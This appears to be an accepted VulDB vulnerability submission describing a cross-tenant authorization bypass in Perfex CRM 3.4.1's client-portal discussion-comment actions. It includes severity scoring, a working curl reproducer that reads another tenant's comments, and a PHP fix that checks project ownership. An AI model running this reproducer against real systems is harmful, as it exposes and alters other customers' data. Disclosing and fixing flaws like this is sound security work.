| Title | Canyon Perfex CRM 3.4.1 Improper Authorization |
|---|
| Description | Perfex CRM 3.4.1 (and likely all earlier 3.x builds) contains a cross-tenant Insecure Direct Object Reference in the client-portal project controller (application/controllers/Clients.php, Clients::project()).
The handler verifies that the project id in the URL belongs to the authenticated client, but its four inner dispatch actions ("discussion_comments", "new_discussion_comment", "update_discussion_comment" and "delete_discussion_comment") accept the discussion id (and comment id) directly from the POST body with no secondary ownership check. An authenticated client-portal user who owns any one project can therefore read, modify, delete or inject discussion comments in any other tenant's project by substituting the victim's discussion_id / comment id in the request body.
CWE-639 (Authorization Bypass Through User-Controlled Key), CWE-284 (Improper Access Control).
CVSS 3.1: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L = 8.1 High.
Minimal reproducer (assumes two client-portal accounts exist, Alice and Bob, each with one project and the "projects" contact permission, which is the default onboarding workflow):

```bash
BASE=http://target.example
JAR=$(mktemp)
# Fetch the login form and extract its CSRF token
TOK=$(curl -s -c "$JAR" "$BASE/authentication/login" | grep -oE 'csrf_token_name" value="[^"]*"' | sed 's/.*value="//;s/"//')
# Log in as Alice (the e-mail field was mangled by address obfuscation in the source and is left as extracted)
curl -s -c "$JAR" -b "$JAR" -o /dev/null -X POST "$BASE/authentication/login" --data-urlencode "csrf_token_name=$TOK" --data-urlencode "[email protected]" --data-urlencode "password=ClientPass1!"
# Project 1 is Alice's own project; take the per-page CSRF token from it
TOK=$(curl -s -b "$JAR" "$BASE/clients/project/1" | grep -oE '"[a-f0-9]{32}"' | head -1 | tr -d '"')
# Dispatch the inner action against discussion 2, which belongs to the victim's project
curl -s -b "$JAR" -H "X-Requested-With: XMLHttpRequest" -X POST "$BASE/clients/project/1" --data-urlencode "csrf_token_name=$TOK" --data-urlencode "action=discussion_comments" --data-urlencode "discussion_id=2" --data-urlencode "discussion_type=regular"
```

The response is a JSON array containing the victim tenant's discussion comments, served to the attacker. The same pattern applies to action=update_discussion_comment (id=), action=new_discussion_comment (discussion_id=) and action=delete_discussion_comment (id=).
Full technical advisory, complete four-action reproducer, impact analysis and recommended fix: see the Bytium advisory URL referenced in this submission.
Fix: re-scope each action's referenced discussion to the current project's clientid before invoking the model method. The helper Projects_model::get_discussion($id, $project_id) already exists and accepts a project_id; it simply is not called from these four actions.
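One way to implement the re-scoping described in the fix, as an added example that is not Perfex CRM's own code: Projects_model::get_discussion($id, $project_id) is the helper named in the advisory, while the comment lookup get_discussion_comment(), the CodeIgniter-style $ci->input / $ci->projects_model calls and the call-site placement are assumptions.

```php
<?php
// Added example for this page, not Perfex CRM's own source: re-scoping the four
// discussion actions to the project Clients::project() has already authorised.
// Only Projects_model::get_discussion($id, $project_id) is named in the advisory;
// get_discussion_comment() and the CodeIgniter-style $ci->input / $ci->projects_model
// calls are assumptions.

const DISCUSSION_ACTIONS = ['discussion_comments', 'new_discussion_comment',
                            'update_discussion_comment', 'delete_discussion_comment'];

// Resolve the discussion the POST body points at. Two actions name it directly
// (discussion_id); the other two name a comment (id), so the comment's parent
// discussion is looked up first. Null when nothing usable was supplied.
function requested_discussion_id(CI_Controller $ci, string $action): ?int
{
    if ($action === 'discussion_comments' || $action === 'new_discussion_comment') {
        $raw = $ci->input->post('discussion_id');
        return ctype_digit((string) $raw) ? (int) $raw : null;
    }
    $raw = $ci->input->post('id');
    if (!ctype_digit((string) $raw)) {
        return null;
    }
    $comment = $ci->projects_model->get_discussion_comment((int) $raw); // assumed helper
    return $comment ? (int) $comment->discussion_id : null;
}

// Fail closed: get_discussion() must return the discussion for *this* project,
// otherwise the request is refused before any model read or write. One 403 for
// both "missing" and "not yours" avoids confirming that a foreign id exists.
function assert_discussion_in_project(CI_Controller $ci, string $action, int $project_id): void
{
    $discussion_id = requested_discussion_id($ci, $action);
    $discussion = $discussion_id === null
        ? null
        : $ci->projects_model->get_discussion($discussion_id, $project_id);
    if (!$discussion) {
        show_error('Access denied', 403);
    }
}

// Call site, inside Clients::project($id) after the existing project-ownership check:
//   $action = (string) $this->input->post('action');
//   if (in_array($action, DISCUSSION_ACTIONS, true)) {
//       assert_discussion_in_project($this, $action, (int) $id);
//   }
```

The guard runs before the action-specific model call, so a forged discussion_id or comment id from another tenant never reaches the read, update, insert or delete path.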
|
|---|
| Source | https://bytium.com/insights/perfex-crm-3-4-1-cross-tenant-broken-access-control-on-project-discussion-comments |
|---|
| User | suffer (UID 74855) |
|---|
| Submission | 18/04/2026 04:26 PM (2 months ago) |
|---|
| Moderation | 04/05/2026 05:58 PM (16 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 360979 [CodeCanyon Perfex CRM up to 3.4.1 Tenant Clients.php Clients::project privilege escalation] |
|---|
| Points | 20 |
|---|